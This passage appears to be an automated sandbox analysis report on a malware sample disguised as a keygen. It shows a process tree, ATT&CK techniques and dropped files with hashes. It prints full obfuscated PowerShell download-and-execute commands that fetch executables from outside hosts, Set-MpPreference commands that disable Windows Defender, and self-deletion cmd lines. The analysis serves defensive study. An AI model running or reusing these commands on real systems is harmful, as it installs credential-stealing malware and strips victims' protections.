                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL omdrklgfia $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;omdrklgfia yvshnex $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|yvshnex;omdrklgfia gemjhbnrwydsof $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL2JpdC5kby9mcWhKdg==';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);gemjhbnrwydsof $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
                  4⤵
                  • Blocklisted process makes network request
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  • Suspicious use of WriteProcessMemory
                  PID:1320
                  • C:\Users\Public\cqi.exe
                    "C:\Users\Public\cqi.exe"
                    5⤵
                    • Executes dropped EXE
                    • Suspicious use of SetThreadContext
                    • Modifies registry class
                    • Suspicious use of AdjustPrivilegeToken
                    PID:4896
                    • C:\Windows\SysWOW64\WScript.exe
                      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Rarujmxnv.vbs"
                      6⤵
                        PID:2592
                        • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                          "C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe"
                          7⤵
                          • Executes dropped EXE
                          • Suspicious use of SetThreadContext
                          • Modifies registry class
                          • Suspicious use of AdjustPrivilegeToken
                          PID:4700
                          • C:\Windows\SysWOW64\WScript.exe
                            "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Coctuoidu.vbs"
                            8⤵
                              PID:2696
                              • C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe
                                "C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe"
                                9⤵
                                • Executes dropped EXE
                                • Suspicious use of SetThreadContext
                                • Suspicious use of AdjustPrivilegeToken
                                PID:4780
                                • C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe
                                  "C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe"
                                  10⤵
                                  • Executes dropped EXE
                                  PID:1468
                            • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                              "C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe"
                              8⤵
                              • Executes dropped EXE
                              • Loads dropped DLL
                              • Checks processor information in registry
                              PID:4348
                              • C:\Windows\SysWOW64\cmd.exe
                                "C:\Windows\System32\cmd.exe" /c taskkill /pid 4348 & erase C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe & RD /S /Q C:\\ProgramData\\515563940627680\\* & exit
                                9⤵
                                  PID:1592
                                  • C:\Windows\SysWOW64\taskkill.exe
                                    taskkill /pid 4348
                                    10⤵
                                    • Kills process with taskkill
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:4236
                          • C:\Users\Public\cqi.exe
                            "C:\Users\Public\cqi.exe"
                            6⤵
                            • Executes dropped EXE
                            PID:2808
                    • C:\Windows\SysWOW64\mshta.exe
                      "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\4A3D.tmp\b1.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
                      3⤵
                      • Suspicious use of WriteProcessMemory
                      PID:964
                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL ftdrmoulpbhgsc $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;ftdrmoulpbhgsc rfmngajuyepx $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|rfmngajuyepx;ftdrmoulpbhgsc hnjmzobgr $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL3Bkc2hjanZudi51Zy96eGN2Yi5leGU=';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);hnjmzobgr $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
                        4⤵
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        PID:3276
                    • C:\Windows\SysWOW64\timeout.exe
                      timeout 2
                      3⤵
                      • Delays execution with timeout.exe
                      PID:1300
                    • C:\Windows\SysWOW64\mshta.exe
                      "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\4A3D.tmp\ba.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
                      3⤵
                      • Suspicious use of WriteProcessMemory
                      PID:1148
                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL vfudzcotabjeq $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;vfudzcotabjeq urdjneqmx $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|urdjneqmx;vfudzcotabjeq wuirkcyfmgjql $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL2JpdC5kby9mcWhKRA==';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);wuirkcyfmgjql $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
                        4⤵
                        • Blocklisted process makes network request
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        • Suspicious use of WriteProcessMemory
                        PID:4220
                        • C:\Users\Public\dom.exe
                          "C:\Users\Public\dom.exe"
                          5⤵
                          • Executes dropped EXE
                          • Suspicious use of SetThreadContext
                          • Suspicious behavior: MapViewOfSection
                          • Suspicious use of SetWindowsHookEx
                          PID:5044
                          • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                            "C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe"
                            6⤵
                            • Executes dropped EXE
                            • Suspicious use of SetThreadContext
                            • Suspicious behavior: MapViewOfSection
                            • Suspicious use of SetWindowsHookEx
                            PID:2036
                            • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                              "C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe"
                              7⤵
                              • Executes dropped EXE
                              • Loads dropped DLL
                              • Checks processor information in registry
                              PID:4648
                              • C:\Windows\SysWOW64\cmd.exe
                                "C:\Windows\System32\cmd.exe" /c taskkill /pid 4648 & erase C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe & RD /S /Q C:\\ProgramData\\156585864207511\\* & exit
                                8⤵
                                  PID:2460
                                  • C:\Windows\SysWOW64\taskkill.exe
                                    taskkill /pid 4648
                                    9⤵
                                    • Kills process with taskkill
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:2712
                            • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                              "C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe"
                              6⤵
                              • Executes dropped EXE
                              • Suspicious use of SetThreadContext
                              • Suspicious behavior: MapViewOfSection
                              • Suspicious use of SetWindowsHookEx
                              PID:1912
                              • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                                "C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe"
                                7⤵
                                • Executes dropped EXE
                                PID:4644
                            • C:\Users\Public\dom.exe
                              "C:\Users\Public\dom.exe"
                              6⤵
                              • Executes dropped EXE
                              PID:4500
                      • C:\Windows\SysWOW64\mshta.exe
                        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\4A3D.tmp\ba1.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
                        3⤵
                        • Suspicious use of WriteProcessMemory
                        PID:4104
                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL wvroy $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;wvroy bwskyfgqtipu $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|bwskyfgqtipu;wvroy shlevpgb $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL3JiY3h2bmIudWcvenhjdmIuZXhl';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);shlevpgb $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
                          4⤵
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of AdjustPrivilegeToken
                          PID:4264
                  • C:\Windows\SysWOW64\DllHost.exe
                    C:\Windows\SysWOW64\DllHost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}
                    1⤵
                      PID:2704
                      • C:\Windows\SysWOW64\cmd.exe
                        cmd /c start C:\Windows\temp\44oznrj2.exe
                        2⤵
                          PID:2424
                          • C:\Windows\temp\44oznrj2.exe
                            C:\Windows\temp\44oznrj2.exe
                            3⤵
                            • Executes dropped EXE
                            PID:996
                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              "powershell" Get-MpPreference -verbose
                              4⤵
                              • Suspicious use of AdjustPrivilegeToken
                              PID:4352
                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableArchiveScanning $true
                              4⤵
                              • Suspicious use of AdjustPrivilegeToken
                              PID:5072
                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableBlockAtFirstSeen $true
                              4⤵
                              • Suspicious use of AdjustPrivilegeToken
                              PID:688
                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableIOAVProtection $true
                              4⤵
                              • Suspicious use of AdjustPrivilegeToken
                              PID:4304
                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisablePrivacyMode $true
                              4⤵
                              • Suspicious use of AdjustPrivilegeToken
                              PID:2664
                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableScriptScanning $true
                              4⤵
                              • Suspicious use of AdjustPrivilegeToken
                              PID:1152
                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -HighThreatDefaultAction 6 -Force
                              4⤵
                              • Suspicious use of AdjustPrivilegeToken
                              PID:4240
                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -LowThreatDefaultAction 6
                              4⤵
                              • Suspicious use of AdjustPrivilegeToken
                              PID:4464
                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -MAPSReporting 0
                              4⤵
                              • Suspicious use of AdjustPrivilegeToken
                              PID:4484
                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ModerateThreatDefaultAction 6
                              4⤵
                              • Suspicious use of AdjustPrivilegeToken
                              PID:2136
                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SevereThreatDefaultAction 6
                              4⤵
                              • Suspicious use of AdjustPrivilegeToken
                              PID:5052
                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true
                              4⤵
                              • Suspicious use of AdjustPrivilegeToken
                              PID:4120
                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SubmitSamplesConsent 2
                              4⤵
                              • Suspicious use of AdjustPrivilegeToken
                              PID:2864
                        • C:\Windows\SysWOW64\taskkill.exe
                          taskkill /IM cmstp.exe /F
                          2⤵
                          • Kills process with taskkill
                          • Suspicious use of AdjustPrivilegeToken
                          PID:3244

                      Network

                      MITRE ATT&CK Matrix ATT&CK v6

                      Persistence

                      Modify Existing Service

                      1
                      T1031

                      Defense Evasion

                      Modify Registry

                      2
                      T1112

                      Disabling Security Tools

                      2
                      T1089

                      Credential Access

                      Credentials in Files

                      3
                      T1081

                      Discovery

                      Query Registry

                      2
                      T1012

                      System Information Discovery

                      2
                      T1082

                      Collection

                      Data from Local System

                      3
                      T1005

                      Replay Monitor

                      Loading Replay Monitor...

                      Downloads

                      • C:\ProgramData\freebl3.dll
                      • C:\ProgramData\freebl3.dll
                      • C:\ProgramData\mozglue.dll
                      • C:\ProgramData\mozglue.dll
                      • C:\ProgramData\msvcp140.dll
                      • C:\ProgramData\msvcp140.dll
                      • C:\ProgramData\nss3.dll
                        MD5

                        bfac4e3c5908856ba17d41edcd455a51

                        SHA1

                        8eec7e888767aa9e4cca8ff246eb2aacb9170428

                        SHA256

                        e2935b5b28550d47dc971f456d6961f20d1633b4892998750140e0eaa9ae9d78

                        SHA512

                        2565bab776c4d732ffb1f9b415992a4c65b81bcd644a9a1df1333a269e322925fc1df4f76913463296efd7c88ef194c3056de2f1ca1357d7b5fe5ff0da877a66

                      • C:\ProgramData\nss3.dll
                        MD5

                        bfac4e3c5908856ba17d41edcd455a51

                        SHA1

                        8eec7e888767aa9e4cca8ff246eb2aacb9170428

                        SHA256

                        e2935b5b28550d47dc971f456d6961f20d1633b4892998750140e0eaa9ae9d78

                        SHA512

                        2565bab776c4d732ffb1f9b415992a4c65b81bcd644a9a1df1333a269e322925fc1df4f76913463296efd7c88ef194c3056de2f1ca1357d7b5fe5ff0da877a66

                      • C:\ProgramData\softokn3.dll
                      • C:\ProgramData\softokn3.dll
                      • C:\ProgramData\sqlite3.dll
                      • C:\ProgramData\sqlite3.dll
                      • C:\ProgramData\vcruntime140.dll
                      • C:\ProgramData\vcruntime140.dll
                      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
                      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                      • C:\Users\Admin\AppData\Local\Temp\4A3D.tmp\Keygen.exe
                      • C:\Users\Admin\AppData\Local\Temp\4A3D.tmp\Keygen.exe
                      • C:\Users\Admin\AppData\Local\Temp\4A3D.tmp\b.hta
                      • C:\Users\Admin\AppData\Local\Temp\4A3D.tmp\b1.hta
                      • C:\Users\Admin\AppData\Local\Temp\4A3D.tmp\ba.hta
                      • C:\Users\Admin\AppData\Local\Temp\4A3D.tmp\ba1.hta
                      • C:\Users\Admin\AppData\Local\Temp\4A3D.tmp\m.hta
                      • C:\Users\Admin\AppData\Local\Temp\4A3D.tmp\m1.hta
                      • C:\Users\Admin\AppData\Local\Temp\4A3D.tmp\start.bat
                      • C:\Users\Admin\AppData\Local\Temp\4njuhHymRF.exe
                      • C:\Users\Admin\AppData\Local\Temp\4njuhHymRF.exe
                      • C:\Users\Admin\AppData\Local\Temp\CIo3LmpDP8.exe
                      • C:\Users\Admin\AppData\Local\Temp\CIo3LmpDP8.exe
                      • C:\Users\Admin\AppData\Local\Temp\Coctuoidu.vbs
                      • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                      • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                      • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                      • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                      • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                      • C:\Users\Admin\AppData\Local\Temp\HbpCU8jR2A.exe
                      • C:\Users\Admin\AppData\Local\Temp\HbpCU8jR2A.exe
                      • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                      • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                      • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                      • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                      • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                      • C:\Users\Admin\AppData\Local\Temp\Rarujmxnv.vbs
                      • C:\Users\Admin\AppData\Local\Temp\ZS9HVlOqS2.exe
                        MD5

                        013db621a3351e3fb049efd2ccad79ff

                        SHA1

                        a23394ea54dbc5342a77938a2c285ee616185560

                        SHA256

                        df1bda6183201e4dc1bc6f6425361a565413e71f09da0648b0c82b39786af27a

                        SHA512

                        1bf6d076677b234c9da7cbc720fc64632b587b4223b5370a7ca3d53c4d59fa59ef117957b1646c92ba80dac332f6c1c313060d35de7236b2585e5bed00d79229

                      • C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe
                      • C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe
                      • C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe
                      • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                      • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                      • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                      • C:\Users\Public\cqi.exe
                      • C:\Users\Public\cqi.exe
                      • C:\Users\Public\cqi.exe
                      • C:\Users\Public\dom.exe
                      • C:\Users\Public\dom.exe
                      • C:\Users\Public\dom.exe
                      • C:\Users\Public\vex.exe
                      • C:\Users\Public\vex.exe
                      • C:\Users\Public\vex.exe
                      • C:\Windows\Temp\44oznrj2.exe
                        MD5

                        f4b5c1ebf4966256f52c4c4ceae87fb1

                        SHA1

                        ca70ec96d1a65cb2a4cbf4db46042275dc75813b

                        SHA256

                        88e7d1e5414b8fceb396130e98482829eac4bdc78fbc3fe7fb3f4432137e0e03

                        SHA512

                        02a7790b31525873ee506eec4ba47800310f7fb4ba58ea7ff4377bf76273ae3d0b4269c7ad866ee7af63471a920c4bd34a9808766e0c51bcaf54ba2e518e6c1e

                      • C:\Windows\temp\44oznrj2.exe
                        MD5

                        f4b5c1ebf4966256f52c4c4ceae87fb1

                        SHA1

                        ca70ec96d1a65cb2a4cbf4db46042275dc75813b

                        SHA256

                        88e7d1e5414b8fceb396130e98482829eac4bdc78fbc3fe7fb3f4432137e0e03

                        SHA512

                        02a7790b31525873ee506eec4ba47800310f7fb4ba58ea7ff4377bf76273ae3d0b4269c7ad866ee7af63471a920c4bd34a9808766e0c51bcaf54ba2e518e6c1e

                      • C:\Windows\temp\drrentxv.inf
                      • \ProgramData\mozglue.dll
                      • \ProgramData\mozglue.dll
                      • \ProgramData\mozglue.dll
                      • \ProgramData\nss3.dll
                        MD5

                        bfac4e3c5908856ba17d41edcd455a51

                        SHA1

                        8eec7e888767aa9e4cca8ff246eb2aacb9170428

                        SHA256

                        e2935b5b28550d47dc971f456d6961f20d1633b4892998750140e0eaa9ae9d78

                        SHA512

                        2565bab776c4d732ffb1f9b415992a4c65b81bcd644a9a1df1333a269e322925fc1df4f76913463296efd7c88ef194c3056de2f1ca1357d7b5fe5ff0da877a66

                      • \ProgramData\nss3.dll
                        MD5

                        bfac4e3c5908856ba17d41edcd455a51

                        SHA1

                        8eec7e888767aa9e4cca8ff246eb2aacb9170428

                        SHA256

                        e2935b5b28550d47dc971f456d6961f20d1633b4892998750140e0eaa9ae9d78

                        SHA512

                        2565bab776c4d732ffb1f9b415992a4c65b81bcd644a9a1df1333a269e322925fc1df4f76913463296efd7c88ef194c3056de2f1ca1357d7b5fe5ff0da877a66

                      • \ProgramData\nss3.dll
                        MD5

                        bfac4e3c5908856ba17d41edcd455a51

                        SHA1

                        8eec7e888767aa9e4cca8ff246eb2aacb9170428

                        SHA256

                        e2935b5b28550d47dc971f456d6961f20d1633b4892998750140e0eaa9ae9d78

                        SHA512

                        2565bab776c4d732ffb1f9b415992a4c65b81bcd644a9a1df1333a269e322925fc1df4f76913463296efd7c88ef194c3056de2f1ca1357d7b5fe5ff0da877a66

                      • \ProgramData\sqlite3.dll
                      • \ProgramData\sqlite3.dll
                      • \ProgramData\sqlite3.dll
                      • \Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\freebl3.dll
                      • \Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\freebl3.dll
                      • \Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\freebl3.dll
                      • \Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\mozglue.dll
                      • \Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\nss3.dll
                        MD5

                        02cc7b8ee30056d5912de54f1bdfc219

                        SHA1

                        a6923da95705fb81e368ae48f93d28522ef552fb

                        SHA256

                        1989526553fd1e1e49b0fea8036822ca062d3d39c4cab4a37846173d0f1753d5

                        SHA512

                        0d5dfcf4fb19b27246fa799e339d67cd1b494427783f379267fb2d10d615ffb734711bab2c515062c078f990a44a36f2d15859b1dacd4143dcc35b5c0cee0ef5

                      • \Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\softokn3.dll
                      • \Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\softokn3.dll
                      • \Users\Admin\AppData\LocalLow\sqlite3.dll
                      • memory/688-374-0x0000000000000000-mapping.dmp
                      • memory/688-381-0x00007FFDD0A80000-0x00007FFDD146C000-memory.dmp
                        Filesize

                        9.9MB

                      • memory/932-17-0x0000000000000000-mapping.dmp
                      • memory/932-73-0x0000000008230000-0x0000000008231000-memory.dmp
                        Filesize

                        4KB

                      • memory/932-25-0x0000000004770000-0x0000000004771000-memory.dmp
                        Filesize

                        4KB

                      • memory/932-56-0x0000000008470000-0x0000000008471000-memory.dmp
                        Filesize

                        4KB

                      • memory/932-99-0x0000000009580000-0x0000000009581000-memory.dmp
                        Filesize

                        4KB

                      • memory/932-21-0x000000006FE40000-0x000000007052E000-memory.dmp
                        Filesize

                        6.9MB

                      • memory/932-101-0x00000000094E0000-0x00000000094E1000-memory.dmp
                        Filesize

                        4KB

                      • memory/932-103-0x000000000A560000-0x000000000A561000-memory.dmp
                        Filesize

                        4KB

                      • memory/964-15-0x0000000000000000-mapping.dmp
